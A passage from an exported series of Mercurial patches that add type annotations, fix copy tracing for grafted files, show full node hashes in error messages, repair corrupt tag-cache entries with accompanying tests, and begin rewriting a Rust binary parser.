fp.write(text) def appendfile(path, text): + # type: (bytes, bytes) -> None with open(path, b'ab') as fp: fp.write(text) @@ -2752,6 +2777,7 @@ def processlinerange(fromline, toline): + # type: (int, int) -> Tuple[int, int] """Check that linerange <fromline>:<toline> makes sense and return a 0-based range. @@ -2811,10 +2837,12 @@ def tolf(s): + # type: (bytes) -> bytes return _eolre.sub(b'\n', s) def tocrlf(s): + # type: (bytes) -> bytes return _eolre.sub(b'\r\n', s) @@ -2878,12 +2906,14 @@ def iterlines(iterator): + # type: (Iterator[bytes]) -> Iterator[bytes] for chunk in iterator: for line in chunk.splitlines(): yield line def expandpath(path): + # type: (bytes) -> bytes return os.path.expanduser(os.path.expandvars(path)) @@ -2914,6 +2944,7 @@ def getport(port): + # type: (Union[bytes, int]) -> int """Return the port for a given network service. If port is an integer, it's returned as is. If it's a string, it's @@ -3012,6 +3043,7 @@ _matchscheme = remod.compile(b'^[a-zA-Z0-9+.\\-]+:').match def __init__(self, path, parsequery=True, parsefragment=True): + # type: (bytes, bool, bool) -> None # We slowly chomp away at path until we have only the path left self.scheme = self.user = self.passwd = self.host = None self.port = self.path = self.query = self.fragment = None @@ -3239,6 +3271,7 @@ return False def localpath(self): + # type: () -> bytes if self.scheme == b'file' or self.scheme == b'bundle': path = self.path or b'/' # For Windows, we need to promote hosts containing drive @@ -3262,18 +3295,22 @@ def hasscheme(path): - return bool(url(path).scheme) + # type: (bytes) -> bool + return bool(url(path).scheme) # cast to help pytype def hasdriveletter(path): - return path and path[1:2] == b':' and path[0:1].isalpha() + # type: (bytes) -> bool + return bool(path) and path[1:2] == b':' and path[0:1].isalpha() def urllocalpath(path): + # type: (bytes) -> bytes return url(path, parsequery=False, parsefragment=False).localpath() def checksafessh(path): + # type: (bytes) -> None """check if a path / url is a potentially unsafe ssh exploit (SEC) This is a sanity check for ssh urls. ssh will parse the first item as @@ -3291,6 +3328,7 @@ def hidepassword(u): + # type: (bytes) -> bytes '''hide user credential in a url string''' u = url(u) if u.passwd: @@ -3299,6 +3337,7 @@ def removeauth(u): + # type: (bytes) -> bytes '''remove all authentication information from a url string''' u = url(u) u.user = u.passwd = None @@ -3404,6 +3443,7 @@ def sizetoint(s): + # type: (bytes) -> int """Convert a space specifier to a byte count. >>> sizetoint(b'30') @@ -3629,6 +3669,7 @@ def _estimatememory(): + # type: () -> Optional[int] """Provide an estimate for the available system memory in Bytes. If no estimate can be provided on the platform, returns None. @@ -3636,7 +3677,12 @@ if pycompat.sysplatform.startswith(b'win'): # On Windows, use the GlobalMemoryStatusEx kernel function directly. from ctypes import c_long as DWORD, c_ulonglong as DWORDLONG - from ctypes.wintypes import Structure, byref, sizeof, windll + from ctypes.wintypes import ( # pytype: disable=import-error + Structure, + byref, + sizeof, + windll, + ) class MEMORYSTATUSEX(Structure): _fields_ = [ # HG changeset patch # User Matt Harbison <matt_harbison@yahoo.com> # Date 1615092224 18000 # Sat Mar 06 23:43:44 2021 -0500 # Node ID 5d483e3bb60ef6afb0cb9e0c0dcf8cdb436f35d2 # Parent 7711853110b9be20bdb68a2f0f90d3a527ac29ff typing: add some type annotations to mercurial/pathutil.py Differential Revision: https://phab.mercurial-scm.org/D10128 diff --git a/mercurial/pathutil.py b/mercurial/pathutil.py --- a/mercurial/pathutil.py +++ b/mercurial/pathutil.py @@ -15,11 +15,21 @@ util, ) +if pycompat.TYPE_CHECKING: + from typing import ( + Any, + Callable, + Iterator, + Optional, + ) + + rustdirs = policy.importrust('dirstate', 'Dirs') parsers = policy.importmod('parsers') def _lowerclean(s): + # type: (bytes) -> bytes return encoding.hfsignoreclean(s.lower()) @@ -59,6 +69,7 @@ self.normcase = lambda x: x def __call__(self, path, mode=None): + # type: (bytes, Optional[Any]) -> None """Check the relative path. path may contain a pattern (e.g. foodir/**.txt)""" @@ -119,6 +130,7 @@ self.audited.add(normpath) def _checkfs(self, prefix, path): + # type: (bytes, bytes) -> None """raise exception if a file system backed check fails""" curpath = os.path.join(self.root, prefix) try: @@ -143,6 +155,7 @@ raise error.Abort(msg % (path, pycompat.bytestr(prefix))) def check(self, path): + # type: (bytes) -> bool try: self(path) return True @@ -164,6 +177,7 @@ def canonpath(root, cwd, myname, auditor=None): + # type: (bytes, bytes, bytes, Optional[pathauditor]) -> bytes """return the canonical path of myname, given cwd and root >>> def check(root, cwd, myname): @@ -266,6 +280,7 @@ def normasprefix(path): + # type: (bytes) -> bytes """normalize the specified path as path prefix Returned value can be used safely for "p.startswith(prefix)", @@ -289,6 +304,7 @@ def finddirs(path): + # type: (bytes) -> Iterator[bytes] pos = path.rfind(b'/') while pos != -1: yield path[:pos] @@ -318,6 +334,7 @@ addpath(f) def addpath(self, path): + # type: (bytes) -> None dirs = self._dirs for base in finddirs(path): if base.endswith(b'/'): @@ -330,6 +347,7 @@ dirs[base] = 1 def delpath(self, path): + # type: (bytes) -> None dirs = self._dirs for base in finddirs(path): if dirs[base] > 1: @@ -341,6 +359,7 @@ return iter(self._dirs) def __contains__(self, d): + # type: (bytes) -> bool return d in self._dirs @@ -355,4 +374,4 @@ # rather not let our internals know that we're thinking in posix terms # - instead we'll let them be oblivious. join = posixpath.join -dirname = posixpath.dirname +dirname = posixpath.dirname # type: Callable[[bytes], bytes] # HG changeset patch # User Martin von Zweigbergk <martinvonz@google.com> # Date 1614968204 28800 # Fri Mar 05 10:16:44 2021 -0800 # Node ID 86ee73018e62f13f4141aa69776710e15fef6a8c # Parent 5d483e3bb60ef6afb0cb9e0c0dcf8cdb436f35d2 tests: demonstrate how grafted copies are counted when tracing across branches This test demonstrates a regression from 1d6d1a15. Differential Revision: https://phab.mercurial-scm.org/D10117 diff --git a/tests/test-copies.t b/tests/test-copies.t --- a/tests/test-copies.t +++ b/tests/test-copies.t @@ -378,6 +378,32 @@ $ hg debugpathcopies 1 3 x -> z +Copy x->y on two separate branches. Pathcopies from one branch to the other +should not report the copy. + $ newrepo + $ echo x > x + $ hg ci -Aqm 'add x' + $ hg cp x y + $ hg ci -qm 'copy x to y' + $ hg co -q 0 + $ hg graft 1 -q + $ hg l + @ 2 copy x to y + | y + | o 1 copy x to y + |/ y + o 0 add x + x + $ hg debugp1copies -r 1 + x -> y + $ hg debugp1copies -r 2 + x -> y +BROKEN: These two should not report any copies + $ hg debugpathcopies 1 2 + x -> y + $ hg debugpathcopies 2 1 + x -> y + Copy x to y on one side of merge, create y and rename to z on the other side. $ newrepo $ echo x > x # HG changeset patch # User Martin von Zweigbergk <martinvonz@google.com> # Date 1614983212 28800 # Fri Mar 05 14:26:52 2021 -0800 # Node ID eca88f5fbcb26488397c2df60f173c6d624d6394 # Parent 86ee73018e62f13f4141aa69776710e15fef6a8c copies: extract function _backwardcopies() for reversing renames I'll add another callers in the next patch. Differential Revision: https://phab.mercurial-scm.org/D10118 diff --git a/mercurial/copies.py b/mercurial/copies.py --- a/mercurial/copies.py +++ b/mercurial/copies.py @@ -704,22 +704,28 @@ def _backwardrenames(a, b, match): + """find renames from a to b""" if a._repo.ui.config(b'experimental', b'copytrace') == b'off': return {} + # We don't want to pass in "match" here, since that would filter + # the destination by it. Since we're reversing the copies, we want + # to filter the source instead. + copies = _forwardcopies(b, a) + return _reverse_renames(copies, a, match) + + +def _reverse_renames(copies, dst, match): + """given copies to context 'dst', finds renames from that context""" # Even though we're not taking copies into account, 1:n rename situations # can still exist (e.g. hg cp a b; hg mv a c). In those cases we # arbitrarily pick one of the renames. - # We don't want to pass in "match" here, since that would filter - # the destination by it. Since we're reversing the copies, we want - # to filter the source instead. - f = _forwardcopies(b, a) r = {} - for k, v in sorted(pycompat.iteritems(f)): + for k, v in sorted(pycompat.iteritems(copies)): if match and not match(v): continue # remove copies - if v in a: + if v in dst: continue r[v] = k return r # HG changeset patch # User Martin von Zweigbergk <martinvonz@google.com> # Date 1614983216 28800 # Fri Mar 05 14:26:56 2021 -0800 # Node ID 324ded1aa2ab683cfe794419b6f5d64b67443b03 # Parent eca88f5fbcb26488397c2df60f173c6d624d6394 copies: inline _backwardrenames() in pathcopies() I'll add another filtering step in `patchcopies()` next. I need access to the forward copies for that. Differential Revision: https://phab.mercurial-scm.org/D10119 diff --git a/mercurial/copies.py b/mercurial/copies.py --- a/mercurial/copies.py +++ b/mercurial/copies.py @@ -761,9 +761,12 @@ base = None if a.rev() != nullrev: base = x + x_copies = _forwardcopies(a, x) + y_copies = _forwardcopies(a, y, base, match=match) + x_backward_renames = _reverse_renames(x_copies, x, match) copies = _chain( - _backwardrenames(x, a, match=match), - _forwardcopies(a, y, base, match=match), + x_backward_renames, + y_copies, ) _filter(x, y, copies) return copies # HG changeset patch # User Martin von Zweigbergk <martinvonz@google.com> # Date 1614874819 28800 # Thu Mar 04 08:20:19 2021 -0800 # Node ID 2803f94b74314f6c72edfe70868da745651477b8 # Parent 324ded1aa2ab683cfe794419b6f5d64b67443b03 copies: filter out copies grafted from another branch Consider this simple history: ``` @ 3 modify y | o 2 copy x to y, modify x | | o 1 copy x to y, modify x |/ o 0 add x ``` If we now rebase commit 3 onto 1, Mercurial will look for copies between commit 2 and commit 1. It does that by going backwards from 2 to 0 and then forwards from 0 to 1. It will find that x was copied to y, since that was what happened on the path between them (namely in commit 1). That leads Mercurial to do a 3-way merge between y@3 and y@1 with x@2 as base. We want to use y@2 as base instead. That's also what happened until commit 1d6d1a15. This patch fixes the regression by adding another filtering step when chaining copies via a diffbase. The new filtering step removes copies that were the same between the two branches (same source and destination, but not necessarily the same contents). Differential Revision: https://phab.mercurial-scm.org/D10120 diff --git a/mercurial/copies.py b/mercurial/copies.py --- a/mercurial/copies.py +++ b/mercurial/copies.py @@ -763,6 +763,11 @@ base = x x_copies = _forwardcopies(a, x) y_copies = _forwardcopies(a, y, base, match=match) + same_keys = set(x_copies) & set(y_copies) + for k in same_keys: + if x_copies.get(k) == y_copies.get(k): + del x_copies[k] + del y_copies[k] x_backward_renames = _reverse_renames(x_copies, x, match) copies = _chain( x_backward_renames, diff --git a/tests/test-copies.t b/tests/test-copies.t --- a/tests/test-copies.t +++ b/tests/test-copies.t @@ -398,11 +398,8 @@ x -> y $ hg debugp1copies -r 2 x -> y -BROKEN: These two should not report any copies $ hg debugpathcopies 1 2 - x -> y $ hg debugpathcopies 2 1 - x -> y Copy x to y on one side of merge, create y and rename to z on the other side. $ newrepo diff --git a/tests/test-graft.t b/tests/test-graft.t --- a/tests/test-graft.t +++ b/tests/test-graft.t @@ -223,10 +223,6 @@ committing changelog updating the branch cache grafting 5:97f8bfe72746 "5" - all copies found (* = to merge, ! = divergent, % = renamed and deleted): - on local side: - src: 'c' -> dst: 'b' - checking for directory renames resolving manifests branchmerge: True, force: True, partial: False ancestor: 4c60f11aa304, local: 6b9e5368ca4e+, remote: 97f8bfe72746 @@ -240,10 +236,6 @@ $ HGEDITOR=cat hg graft 4 3 --log --debug scanning for duplicate grafts grafting 4:9c233e8e184d "4" - all copies found (* = to merge, ! = divergent, % = renamed and deleted): - on local side: - src: 'c' -> dst: 'b' - checking for directory renames resolving manifests branchmerge: True, force: True, partial: False ancestor: 4c60f11aa304, local: 1905859650ec+, remote: 9c233e8e184d # HG changeset patch # User Pulkit Goyal <7895pulkit@gmail.com> # Date 1612958094 -19800 # Wed Feb 10 17:24:54 2021 +0530 # Node ID 6fc57680cfd64aa4f1843b44402c6661aed7cb9d # Parent 2803f94b74314f6c72edfe70868da745651477b8 error: remove shortening of node in error message This strips the complete 20 bytes node which was not found. Having the the full node in error message is important as it makes debugging easier. If a short node is to be displayed, that should be done by callers. Differential Revision: https://phab.mercurial-scm.org/D9994 diff --git a/mercurial/error.py b/mercurial/error.py --- a/mercurial/error.py +++ b/mercurial/error.py @@ -73,9 +73,9 @@ # Python 2.6+ complain about the 'message' property being deprecated self.lookupmessage = message if isinstance(name, bytes) and len(name) == 20: - from .node import short + from .node import hex - name = short(name) + name = hex(name) # if name is a binary node, it can be None RevlogError.__init__( self, b'%s@%s: %s' % (index, pycompat.bytestr(name), message) diff --git a/tests/test-bundle-r.t b/tests/test-bundle-r.t --- a/tests/test-bundle-r.t +++ b/tests/test-bundle-r.t @@ -223,7 +223,7 @@ adding changesets transaction abort! rollback completed - abort: 00changelog.i@93ee6ab32777: unknown parent + abort: 00changelog.i@93ee6ab32777cd430e07da694794fb6a4f917712: unknown parent [50] revision 2 diff --git a/tests/test-bundle.t b/tests/test-bundle.t --- a/tests/test-bundle.t +++ b/tests/test-bundle.t @@ -733,7 +733,7 @@ partial history bundle, fails w/ unknown parent $ hg -R bundle.hg verify - abort: 00changelog.i@bbd179dfa0a7: unknown parent + abort: 00changelog.i@bbd179dfa0a71671c253b3ae0aa1513b60d199fa: unknown parent [50] full history bundle, refuses to verify non-local repo diff --git a/tests/test-convert-filemap.t b/tests/test-convert-filemap.t --- a/tests/test-convert-filemap.t +++ b/tests/test-convert-filemap.t @@ -292,12 +292,12 @@ $ rm -rf source/.hg/store/data/dir/file4 #endif $ hg -q convert --filemap renames.fmap --datesort source dummydest - abort: data/dir/file3.i@e96dce0bc6a2: no match found (reporevlogstore !) + abort: data/dir/file3.i@e96dce0bc6a217656a3a410e5e6bec2c4f42bf7c: no match found (reporevlogstore !) abort: data/dir/file3/index@e96dce0bc6a2: no node (reposimplestore !) [50] $ hg -q convert --filemap renames.fmap --datesort --config convert.hg.ignoreerrors=1 source renames.repo - ignoring: data/dir/file3.i@e96dce0bc6a2: no match found (reporevlogstore !) - ignoring: data/dir/file4.i@6edd55f559cd: no match found (reporevlogstore !) + ignoring: data/dir/file3.i@e96dce0bc6a217656a3a410e5e6bec2c4f42bf7c: no match found (reporevlogstore !) + ignoring: data/dir/file4.i@6edd55f559cdce67132b12ca09e09cee08b60442: no match found (reporevlogstore !) ignoring: data/dir/file3/index@e96dce0bc6a2: no node (reposimplestore !) ignoring: data/dir/file4/index@6edd55f559cd: no node (reposimplestore !) $ hg up -q -R renames.repo diff --git a/tests/test-convert-hg-source.t b/tests/test-convert-hg-source.t --- a/tests/test-convert-hg-source.t +++ b/tests/test-convert-hg-source.t @@ -182,7 +182,7 @@ sorting... converting... 4 init - ignoring: data/b.i@1e88685f5dde: no match found (reporevlogstore !) + ignoring: data/b.i@1e88685f5ddec574a34c70af492f95b6debc8741: no match found (reporevlogstore !) ignoring: data/b/index@1e88685f5dde: no node (reposimplestore !) 3 changeall 2 changebagain diff --git a/tests/test-hgweb-filelog.t b/tests/test-hgweb-filelog.t --- a/tests/test-hgweb-filelog.t +++ b/tests/test-hgweb-filelog.t @@ -656,7 +656,7 @@ An error occurred while processing your request: </p> <p> - a@6563da9dcf87: not found in manifest + a@6563da9dcf87b1949716e38ff3e3dfaa3198eb06: not found in manifest </p> </div> </div> diff --git a/tests/test-hgweb.t b/tests/test-hgweb.t --- a/tests/test-hgweb.t +++ b/tests/test-hgweb.t @@ -149,7 +149,7 @@ 404 Not Found - error: bork@2ef0ac749a14: not found in manifest + error: bork@2ef0ac749a14e4f57a5a822464a0902c6f7f448f: not found in manifest [1] $ get-with-headers.py localhost:$HGPORT 'file/tip/bork' 404 Not Found @@ -202,7 +202,7 @@ An error occurred while processing your request: </p> <p> - bork@2ef0ac749a14: not found in manifest + bork@2ef0ac749a14e4f57a5a822464a0902c6f7f448f: not found in manifest </p> </div> </div> @@ -218,7 +218,7 @@ 404 Not Found - error: bork@2ef0ac749a14: not found in manifest + error: bork@2ef0ac749a14e4f57a5a822464a0902c6f7f448f: not found in manifest [1] try bad style diff --git a/tests/test-hgwebdir.t b/tests/test-hgwebdir.t --- a/tests/test-hgwebdir.t +++ b/tests/test-hgwebdir.t @@ -103,7 +103,7 @@ 404 Not Found - error: bork@8580ff50825a: not found in manifest + error: bork@8580ff50825a50c8f716709acdf8de0deddcd6ab: not found in manifest [1] should succeed diff --git a/tests/test-narrow-exchange.t b/tests/test-narrow-exchange.t --- a/tests/test-narrow-exchange.t +++ b/tests/test-narrow-exchange.t @@ -105,7 +105,7 @@ remote: adding file changes remote: transaction abort! remote: rollback completed - remote: abort: data/inside2/f.i@4a1aa07735e6: unknown parent (reporevlogstore !) + remote: abort: data/inside2/f.i@4a1aa07735e673e20c00fae80f40dc301ee30616: unknown parent (reporevlogstore !) remote: abort: data/inside2/f/index@4a1aa07735e6: no node (reposimplestore !) abort: stream ended unexpectedly (got 0 bytes, expected 4) [255] @@ -218,8 +218,8 @@ remote: adding manifests remote: adding file changes remote: added 1 changesets with 0 changes to 0 files (no-lfs-on !) - remote: error: pretxnchangegroup.lfs hook raised an exception: data/inside2/f.i@f59b4e021835: no match found (lfs-on !) + remote: error: pretxnchangegroup.lfs hook raised an exception: data/inside2/f.i@f59b4e0218355383d2789196f1092abcf2262b0c: no match found (lfs-on !) remote: transaction abort! (lfs-on !) remote: rollback completed (lfs-on !) - remote: abort: data/inside2/f.i@f59b4e021835: no match found (lfs-on !) + remote: abort: data/inside2/f.i@f59b4e0218355383d2789196f1092abcf2262b0c: no match found (lfs-on !) abort: stream ended unexpectedly (got 0 bytes, expected 4) (lfs-on !) diff --git a/tests/test-pull-bundle.t b/tests/test-pull-bundle.t --- a/tests/test-pull-bundle.t +++ b/tests/test-pull-bundle.t @@ -185,7 +185,7 @@ adding changesets adding manifests adding file changes - abort: 00changelog.i@66f7d451a68b: no node + abort: 00changelog.i@66f7d451a68b85ed82ff5fcc254daf50c74144bd: no node [50] $ cd .. $ killdaemons.py # HG changeset patch # User Pulkit Goyal <7895pulkit@gmail.com> # Date 1613481222 -19800 # Tue Feb 16 18:43:42 2021 +0530 # Node ID 75832107ec07034e44d2fe3e1f375ed325d86abb # Parent 6fc57680cfd64aa4f1843b44402c6661aed7cb9d hgtagsfnodes: refactor code to compute fnode into separate fn I plan to use this code at one more place while fixing a bug caused by an invalid fnode present in cache. Differential Revision: https://phab.mercurial-scm.org/D10013 diff --git a/mercurial/tags.py b/mercurial/tags.py --- a/mercurial/tags.py +++ b/mercurial/tags.py @@ -777,6 +777,15 @@ return False return None + fnode = self._computefnode(node) + self._writeentry(offset, properprefix, fnode) + return fnode + + def _computefnode(self, node): + """Finds the tag filenode for a node which is missing or invalid + in cache""" + ctx = self._repo[node] + rev = ctx.rev() fnode = None cl = self._repo.changelog p1rev, p2rev = cl._uncheckedparentrevs(rev) @@ -804,8 +813,6 @@ except error.LookupError: # No .hgtags file on this revision. fnode = nullid - - self._writeentry(offset, properprefix, fnode) return fnode def setfnode(self, node, fnode): # HG changeset patch # User Pulkit Goyal <7895pulkit@gmail.com> # Date 1613488094 -19800 # Tue Feb 16 20:38:14 2021 +0530 # Node ID 9306a16ca96439123f5a34381cd74378d62f95f0 # Parent 75832107ec07034e44d2fe3e1f375ed325d86abb debugcommands: prevent using `is False` I was touching this code in a future patch and marmoute warned about usage of `is False` here. Quoting marmoute: ``` "is False" is going to check if the object you have the very same object in memory than the one Python allocated for False (in practice 0) This will "mostly work" on cpython because of implementation details, but is semantically wrong and can start breaking unexpectedly ``` Differential Revision: https://phab.mercurial-scm.org/D10014 diff --git a/mercurial/debugcommands.py b/mercurial/debugcommands.py --- a/mercurial/debugcommands.py +++ b/mercurial/debugcommands.py @@ -3870,10 +3870,10 @@ tagsnode = cache.getfnode(node, computemissing=False) if tagsnode: tagsnodedisplay = hex(tagsnode) - elif tagsnode is False: + elif tagsnode is None: + tagsnodedisplay = b'missing' + else: tagsnodedisplay = b'invalid' - else: - tagsnodedisplay = b'missing' ui.write(b'%d %s %s\n' % (r, hex(node), tagsnodedisplay)) # HG changeset patch # User Matt Harbison <matt_harbison@yahoo.com> # Date 1608830626 18000 # Thu Dec 24 12:23:46 2020 -0500 # Node ID 9ea6b75b4a95f9f98aed6c895bb92a80f6e824e9 # Parent 9306a16ca96439123f5a34381cd74378d62f95f0 tests: demonstrate a case where a corrupt tag cache causes an abort I happened to hit this trying to cover other cases around valid vs missing entries. I have no idea if this is something that could occur more naturally (similar to how a missing file node in `hgtagsfnodes1` can occur after a strip). There is a test just above this added in f5a7cf0adb12 mentioning it "overwrites the junk", though that tests truncation instead of actual garbage. But since this is just a cache, it probably shouldn't abort with a cryptic message like this. The two options I see both have downsides- either rebuild the cache (and potentially take a long time), or hint to the user to run a debug command. Differential Revision: https://phab.mercurial-scm.org/D9812 diff --git a/tests/test-tags.t b/tests/test-tags.t --- a/tests/test-tags.t +++ b/tests/test-tags.t @@ -417,6 +417,49 @@ tip 5:8dbfe60eff30 bar 1:78391a272241 +BUG: If the filenode part of an entry in hgtagsfnodes is corrupt and +tags2-visible is missing, `hg tags` aborts. Corrupting the leading 4 bytes of +node hash (as above) doesn't seem to trigger the issue. Also note that the +debug command hides the corruption, both with and without tags2-visible. + + $ mv .hg/cache/hgtagsfnodes1 .hg/cache/hgtagsfnodes1.bak + $ hg debugupdatecaches + + >>> import os + >>> with open(".hg/cache/hgtagsfnodes1", "rb+") as fp: + ... fp.seek(-16, os.SEEK_END) and None + ... fp.write(b'\xde\xad') and None + + $ f --size --hexdump .hg/cache/hgtagsfnodes1 + .hg/cache/hgtagsfnodes1: size=144 + 0000: bb d1 79 df 00 00 00 00 00 00 00 00 00 00 00 00 |..y.............| + 0010: 00 00 00 00 00 00 00 00 78 39 1a 27 0c 04 f2 a8 |........x9.'....| + 0020: af 31 de 17 fa b7 42 28 78 ee 5a 2d ad bc 94 3d |.1....B(x.Z-...=| + 0030: 7a 94 12 77 0c 04 f2 a8 af 31 de 17 fa b7 42 28 |z..w.....1....B(| + 0040: 78 ee 5a 2d ad bc 94 3d 6f a4 50 21 7d 3b 71 8c |x.Z-...=o.P!};q.| + 0050: 96 4e f3 7b 89 e5 50 eb da fd 57 89 e7 6c e1 b0 |.N.{..P...W..l..| + 0060: 0c 19 2d 7d 0c 04 f2 a8 af 31 de 17 fa b7 42 28 |..-}.....1....B(| + 0070: 78 ee 5a 2d ad bc 94 3d 8d bf e6 0e 0c 04 f2 a8 |x.Z-...=........| + 0080: de ad de 17 fa b7 42 28 78 ee 5a 2d ad bc 94 3d |......B(x.Z-...=| + + $ hg debugtagscache | tail -2 + 4 0c192d7d5e6b78a714de54a2e9627952a877e25a 0c04f2a8af31de17fab7422878ee5a2dadbc943d + 5 8dbfe60eff306a54259cfe007db9e330e7ecf866 0c04f2a8deadde17fab7422878ee5a2dadbc943d + + $ rm -f .hg/cache/tags2-visible + $ hg debugtagscache | tail -2 + 4 0c192d7d5e6b78a714de54a2e9627952a877e25a 0c04f2a8af31de17fab7422878ee5a2dadbc943d + 5 8dbfe60eff306a54259cfe007db9e330e7ecf866 0c04f2a8deadde17fab7422878ee5a2dadbc943d + + $ hg tags + abort: data/.hgtags.i@0c04f2a8deadde17fab7422878ee5a2dadbc943d: no match found + [50] + +BUG: Unless this file is restored, the `hg tags` in the next unix-permissions +conditional will fail: "abort: data/.hgtags.i@0c04f2a8dead: no match found" + + $ mv .hg/cache/hgtagsfnodes1.bak .hg/cache/hgtagsfnodes1 + #if unix-permissions no-root Errors writing to .hgtags fnodes cache are silently ignored # HG changeset patch # User Pulkit Goyal <7895pulkit@gmail.com> # Date 1613389098 -19800 # Mon Feb 15 17:08:18 2021 +0530 # Node ID e4e971abb6a35358d06122e5df927c80bab54e83 # Parent 9ea6b75b4a95f9f98aed6c895bb92a80f6e824e9 debugtagscache: verify that filenode is correct Previous patch from Matt demonstrates that `debugtagscache` does not warn about filenode being unknown which can be caused by a corrupted cache. We start by showing that it's an unknown node. Differential Revision: https://phab.mercurial-scm.org/D10015 diff --git a/mercurial/debugcommands.py b/mercurial/debugcommands.py --- a/mercurial/debugcommands.py +++ b/mercurial/debugcommands.py @@ -3865,11 +3865,14 @@ def debugtagscache(ui, repo): """display the contents of .hg/cache/hgtagsfnodes1""" cache = tagsmod.hgtagsfnodescache(repo.unfiltered()) + flog = repo.file(b'.hgtags') for r in repo: node = repo[r].node() tagsnode = cache.getfnode(node, computemissing=False) if tagsnode: tagsnodedisplay = hex(tagsnode) + if not flog.hasnode(tagsnode): + tagsnodedisplay += b' (unknown node)' elif tagsnode is None: tagsnodedisplay = b'missing' else: diff --git a/tests/test-tags.t b/tests/test-tags.t --- a/tests/test-tags.t +++ b/tests/test-tags.t @@ -444,12 +444,12 @@ $ hg debugtagscache | tail -2 4 0c192d7d5e6b78a714de54a2e9627952a877e25a 0c04f2a8af31de17fab7422878ee5a2dadbc943d - 5 8dbfe60eff306a54259cfe007db9e330e7ecf866 0c04f2a8deadde17fab7422878ee5a2dadbc943d + 5 8dbfe60eff306a54259cfe007db9e330e7ecf866 0c04f2a8deadde17fab7422878ee5a2dadbc943d (unknown node) $ rm -f .hg/cache/tags2-visible $ hg debugtagscache | tail -2 4 0c192d7d5e6b78a714de54a2e9627952a877e25a 0c04f2a8af31de17fab7422878ee5a2dadbc943d - 5 8dbfe60eff306a54259cfe007db9e330e7ecf866 0c04f2a8deadde17fab7422878ee5a2dadbc943d + 5 8dbfe60eff306a54259cfe007db9e330e7ecf866 0c04f2a8deadde17fab7422878ee5a2dadbc943d (unknown node) $ hg tags abort: data/.hgtags.i@0c04f2a8deadde17fab7422878ee5a2dadbc943d: no match found # HG changeset patch # User Pulkit Goyal <7895pulkit@gmail.com> # Date 1614623545 -19800 # Tue Mar 02 00:02:25 2021 +0530 # Node ID 9a31f65381ae1404db8c908197eda610dbecc080 # Parent e4e971abb6a35358d06122e5df927c80bab54e83 tags: validate nodes in _getfnodes() and update cache in case of unknown nodes `hgtagsfnodescache` can contain unknown nodes due to cache corruption and this lead to a traceback on operations like `hg tags` as we don't validate nodes. This patch validates that all filenodes returned after `hgtagsfnodescache` are known to the repository. If there exists any unknown filenode, we force recompute it and update the cache. The test change demonstrates the fix. Differential Revision: https://phab.mercurial-scm.org/D10083 diff --git a/mercurial/tags.py b/mercurial/tags.py --- a/mercurial/tags.py +++ b/mercurial/tags.py @@ -494,11 +494,25 @@ starttime = util.timer() fnodescache = hgtagsfnodescache(repo.unfiltered()) cachefnode = {} + validated_fnodes = set() + unknown_entries = set() for node in nodes: fnode = fnodescache.getfnode(node) + flog = repo.file(b'.hgtags') if fnode != nullid: + if fnode not in validated_fnodes: + if flog.hasnode(fnode): + validated_fnodes.add(fnode) + else: + unknown_entries.add(node) cachefnode[node] = fnode + if unknown_entries: + fixed_nodemap = fnodescache.refresh_invalid_nodes(unknown_entries) + for node, fnode in pycompat.iteritems(fixed_nodemap): + if fnode != nullid: + cachefnode[node] = fnode + fnodescache.write() duration = util.timer() - starttime @@ -826,6 +840,21 @@ self._writeentry(ctx.rev() * _fnodesrecsize, node[0:4], fnode) + def refresh_invalid_nodes(self, nodes): + """recomputes file nodes for a given set of nodes which has unknown + filenodes for them in the cache + Also updates the in-memory cache with the correct filenode. + Caller needs to take care about calling `.write()` so that updates are + persisted. + Returns a map {node: recomputed fnode} + """ + fixed_nodemap = {} + for node in nodes: + fnode = self._computefnode(node) + fixed_nodemap[node] = fnode + self.setfnode(node, fnode) + return fixed_nodemap + def _writeentry(self, offset, prefix, fnode): # Slices on array instances only accept other array. entry = bytearray(prefix + fnode) diff --git a/tests/test-tags.t b/tests/test-tags.t --- a/tests/test-tags.t +++ b/tests/test-tags.t @@ -452,8 +452,8 @@ 5 8dbfe60eff306a54259cfe007db9e330e7ecf866 0c04f2a8deadde17fab7422878ee5a2dadbc943d (unknown node) $ hg tags - abort: data/.hgtags.i@0c04f2a8deadde17fab7422878ee5a2dadbc943d: no match found - [50] + tip 5:8dbfe60eff30 + bar 1:78391a272241 BUG: Unless this file is restored, the `hg tags` in the next unix-permissions conditional will fail: "abort: data/.hgtags.i@0c04f2a8dead: no match found" # HG changeset patch # User Simon Sapin <simon.sapin@octobus.net> # Date 1609971119 -3600 # Wed Jan 06 23:11:59 2021 +0100 # Node ID f977a065c7c2bed8b74375312791b79de26a7cb2 # Parent 9a31f65381ae1404db8c908197eda610dbecc080 copies-rust: rewrite ChangedFiles binary parsing by using the new from-bytes-safe crate and a custom struct that encodes the expected data structure. Differential Revision: https://phab.mercurial-scm.org/D10068 diff --git a/rust/hg-core/src/copy_tracing.rs b/rust/hg-core/src/copy_tracing.rs --- a/rust/hg-core/src/copy_tracing.rs +++ b/rust/hg-core/src/copy_tracing.rs @@ -3,13 +3,13 @@ use crate::Revision; use crate::NULL_REVISION; +use bytes_cast::{unaligned, BytesCast}; use im_rc::ordmap::Entry; use im_rc::ordmap::OrdMap; use im_rc::OrdSet; use std::cmp::Ordering; use std::collections::HashMap; -use std::convert::TryInto; pub type PathCopies = HashMap<HgPathBuf, HgPathBuf>; @@ -110,18 +110,6 @@ /// maps CopyDestination to Copy Source (+ a "timestamp" for the operation) type InternalPathCopies = OrdMap<PathToken, CopySource>; -/// represent the files affected by a changesets -/// -/// This hold a subset of mercurial.metadata.ChangingFiles as we do not need -/// all the data categories tracked by it. -/// This hold a subset of mercurial.metadata.ChangingFiles as we do not need -/// all the data categories tracked by it. -pub struct ChangedFiles<'a> { - nb_items: u32, - index: &'a [u8], - data: &'a [u8], -} - /// Represent active changes that affect the copy tracing. enum Action<'a> { /// The parent ? children edge is removing a file @@ -148,9 +136,6 @@ Normal, } -type FileChange<'a> = (u8, &'a HgPath, &'a HgPath); - -const EMPTY: &[u8] = b""; const COPY_MASK: u8 = 3; const P1_COPY: u8 = 2; const P2_COPY: u8 = 3; @@ -159,141 +144,94 @@ const MERGED: u8 = 8; const SALVAGED: u8 = 16; -impl<'a> ChangedFiles<'a> { - const INDEX_START: usize = 4; - const ENTRY_SIZE: u32 = 9; - const FILENAME_START: u32 = 1; - const COPY_SOURCE_START: u32 = 5; +#[derive(BytesCast)] +#[repr(C)] +struct ChangedFilesIndexEntry { + flags: u8, - pub fn new(data: &'a [u8]) -> Self { - assert!( - data.len() >= 4, - "data size ({}) is too small to contain the header (4)", - data.len() - ); - let 